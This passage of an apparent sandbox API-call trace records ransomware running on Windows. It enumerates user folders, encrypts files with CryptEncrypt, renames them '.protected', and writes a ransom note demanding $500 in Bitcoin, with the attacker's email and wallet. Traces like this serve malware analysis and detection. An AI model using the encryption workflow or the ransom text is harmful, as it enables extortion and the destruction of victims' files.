lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\U-9jEHg7uBi.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\u-9jehg7ubi.m4a.protected")) returned 1 [0092.382] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.382] lstrcmpiW (lpString1="wokEkE8gfwA0WvaR - W.m4a", lpString2="Windows") returned 1 [0092.382] lstrcmpiW (lpString1="wokEkE8gfwA0WvaR - W.m4a", lpString2="Program Files") returned 1 [0092.382] lstrcmpiW (lpString1="wokEkE8gfwA0WvaR - W.m4a", lpString2="Program Files (x86)") returned 1 [0092.382] lstrcmpiW (lpString1="wokEkE8gfwA0WvaR - W.m4a", lpString2="$Recycle.bin") returned 1 [0092.382] lstrcmpiW (lpString1="wokEkE8gfwA0WvaR - W.m4a", lpString2="System Volume Information") returned 1 [0092.382] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wokEkE8gfwA0WvaR - W.m4a") returned 64 [0092.382] StrStrIW (lpFirst="wokEkE8gfwA0WvaR - W.m4a", lpSrch=".protected") returned 0x0 [0092.382] lstrcmpW (lpString1="wokEkE8gfwA0WvaR - W.m4a", lpString2="RESTORE_FILES.txt") returned 1 [0092.382] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.382] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.382] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wokEkE8gfwA0WvaR - W.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wokeke8gfwa0wvar - w.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.382] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wokEkE8gfwA0WvaR - W.m4a") returned 64 [0092.382] StrStrW (lpFirst="wokEkE8gfwA0WvaR - W.m4a", lpSrch=".txt") returned 0x0 [0092.382] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wokEkE8gfwA0WvaR - W.m4a") returned 64 [0092.382] StrStrW (lpFirst="wokEkE8gfwA0WvaR - W.m4a", lpSrch=".rar") returned 0x0 [0092.382] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wokEkE8gfwA0WvaR - W.m4a") returned 64 [0092.382] StrStrW (lpFirst="wokEkE8gfwA0WvaR - W.m4a", lpSrch=".zip") returned 0x0 [0092.382] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.383] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.383] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.383] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.383] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.383] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.383] CloseHandle (hObject=0xb4) returned 1 [0092.383] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wokEkE8gfwA0WvaR - W.m4a.protected") returned 74 [0092.383] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wokEkE8gfwA0WvaR - W.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wokeke8gfwa0wvar - w.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wokEkE8gfwA0WvaR - W.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wokeke8gfwa0wvar - w.m4a.protected")) returned 1 [0092.384] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0092.384] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0092.384] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RESTORE_FILES.txt") returned 57 [0092.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0092.384] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.384] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0092.385] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0092.385] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0092.385] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.385] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0092.385] CloseHandle (hObject=0xa4) returned 1 [0092.385] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.385] lstrcmpiW (lpString1="My Documents", lpString2="Windows") returned -1 [0092.386] lstrcmpiW (lpString1="My Documents", lpString2="Program Files") returned -1 [0092.386] lstrcmpiW (lpString1="My Documents", lpString2="Program Files (x86)") returned -1 [0092.386] lstrcmpiW (lpString1="My Documents", lpString2="$Recycle.bin") returned 1 [0092.386] lstrcmpiW (lpString1="My Documents", lpString2="System Volume Information") returned -1 [0092.386] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents") returned 46 [0092.386] lstrcmpW (lpString1="My Documents", lpString2=".") returned 1 [0092.386] lstrcmpW (lpString1="My Documents", lpString2="..") returned 1 [0092.386] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*") returned 48 [0092.386] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0092.386] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.386] lstrcmpiW (lpString1="NetHood", lpString2="Windows") returned -1 [0092.386] lstrcmpiW (lpString1="NetHood", lpString2="Program Files") returned -1 [0092.386] lstrcmpiW (lpString1="NetHood", lpString2="Program Files (x86)") returned -1 [0092.386] lstrcmpiW (lpString1="NetHood", lpString2="$Recycle.bin") returned 1 [0092.386] lstrcmpiW (lpString1="NetHood", lpString2="System Volume Information") returned -1 [0092.386] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood") returned 41 [0092.386] lstrcmpW (lpString1="NetHood", lpString2=".") returned 1 [0092.386] lstrcmpW (lpString1="NetHood", lpString2="..") returned 1 [0092.386] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*") returned 43 [0092.386] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0092.386] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.386] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="Windows") returned -1 [0092.386] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="Program Files") returned -1 [0092.386] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="Program Files (x86)") returned -1 [0092.386] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="$Recycle.bin") returned 1 [0092.386] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="System Volume Information") returned -1 [0092.386] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned 44 [0092.386] StrStrIW (lpFirst="NTUSER.DAT", lpSrch=".protected") returned 0x0 [0092.386] lstrcmpW (lpString1="NTUSER.DAT", lpString2="RESTORE_FILES.txt") returned -1 [0092.386] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0092.386] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0092.386] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.386] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.386] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="Windows") returned -1 [0092.387] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="Program Files") returned -1 [0092.387] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="Program Files (x86)") returned -1 [0092.387] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="$Recycle.bin") returned 1 [0092.387] lstrcmpiW (lpString1="ntuser.dat.LOG1", lpString2="System Volume Information") returned -1 [0092.387] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned 49 [0092.387] StrStrIW (lpFirst="ntuser.dat.LOG1", lpSrch=".protected") returned 0x0 [0092.387] lstrcmpW (lpString1="ntuser.dat.LOG1", lpString2="RESTORE_FILES.txt") returned -1 [0092.387] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0092.387] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0092.387] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.387] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.387] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="Windows") returned -1 [0092.387] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="Program Files") returned -1 [0092.387] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="Program Files (x86)") returned -1 [0092.387] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="$Recycle.bin") returned 1 [0092.387] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="System Volume Information") returned -1 [0092.387] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned 49 [0092.387] StrStrIW (lpFirst="ntuser.dat.LOG2", lpSrch=".protected") returned 0x0 [0092.387] lstrcmpW (lpString1="ntuser.dat.LOG2", lpString2="RESTORE_FILES.txt") returned -1 [0092.387] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0092.387] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0092.387] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.387] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.387] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="Windows") returned -1 [0092.387] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="Program Files") returned -1 [0092.387] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="Program Files (x86)") returned -1 [0092.387] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="$Recycle.bin") returned 1 [0092.387] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="System Volume Information") returned -1 [0092.387] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 89 [0092.387] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".protected") returned 0x0 [0092.387] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="RESTORE_FILES.txt") returned -1 [0092.387] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0092.387] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0092.387] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.388] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.388] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="Windows") returned -1 [0092.388] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="Program Files") returned -1 [0092.388] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="Program Files (x86)") returned -1 [0092.388] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="$Recycle.bin") returned 1 [0092.388] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="System Volume Information") returned -1 [0092.388] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 126 [0092.388] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".protected") returned 0x0 [0092.388] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="RESTORE_FILES.txt") returned -1 [0092.388] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0092.388] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0092.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.388] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.388] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="Windows") returned -1 [0092.388] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="Program Files") returned -1 [0092.388] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="Program Files (x86)") returned -1 [0092.388] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="$Recycle.bin") returned 1 [0092.388] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="System Volume Information") returned -1 [0092.388] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 126 [0092.388] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".protected") returned 0x0 [0092.388] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="RESTORE_FILES.txt") returned -1 [0092.388] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0092.388] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0092.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.388] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0092.388] lstrcmpiW (lpString1="ntuser.ini", lpString2="Windows") returned -1 [0092.388] lstrcmpiW (lpString1="ntuser.ini", lpString2="Program Files") returned -1 [0092.388] lstrcmpiW (lpString1="ntuser.ini", lpString2="Program Files (x86)") returned -1 [0092.388] lstrcmpiW (lpString1="ntuser.ini", lpString2="$Recycle.bin") returned 1 [0092.388] lstrcmpiW (lpString1="ntuser.ini", lpString2="System Volume Information") returned -1 [0092.388] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned 44 [0092.388] StrStrIW (lpFirst="ntuser.ini", lpSrch=".protected") returned 0x0 [0092.388] lstrcmpW (lpString1="ntuser.ini", lpString2="RESTORE_FILES.txt") returned -1 [0092.388] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0092.388] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0092.389] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0092.389] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned 44 [0092.389] StrStrW (lpFirst="ntuser.ini", lpSrch=".txt") returned 0x0 [0092.389] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned 44 [0092.389] StrStrW (lpFirst="ntuser.ini", lpSrch=".rar") returned 0x0 [0092.389] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned 44 [0092.389] StrStrW (lpFirst="ntuser.ini", lpSrch=".zip") returned 0x0 [0092.389] ReadFile (in: hFile=0xa4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f3e4*=0x14, lpOverlapped=0x0) returned 1 [0092.390] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xffffffec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.390] WriteFile (in: hFile=0xa4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f3e4*=0x14, lpOverlapped=0x0) returned 1 [0092.391] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.391] WriteFile (in: hFile=0xa4, 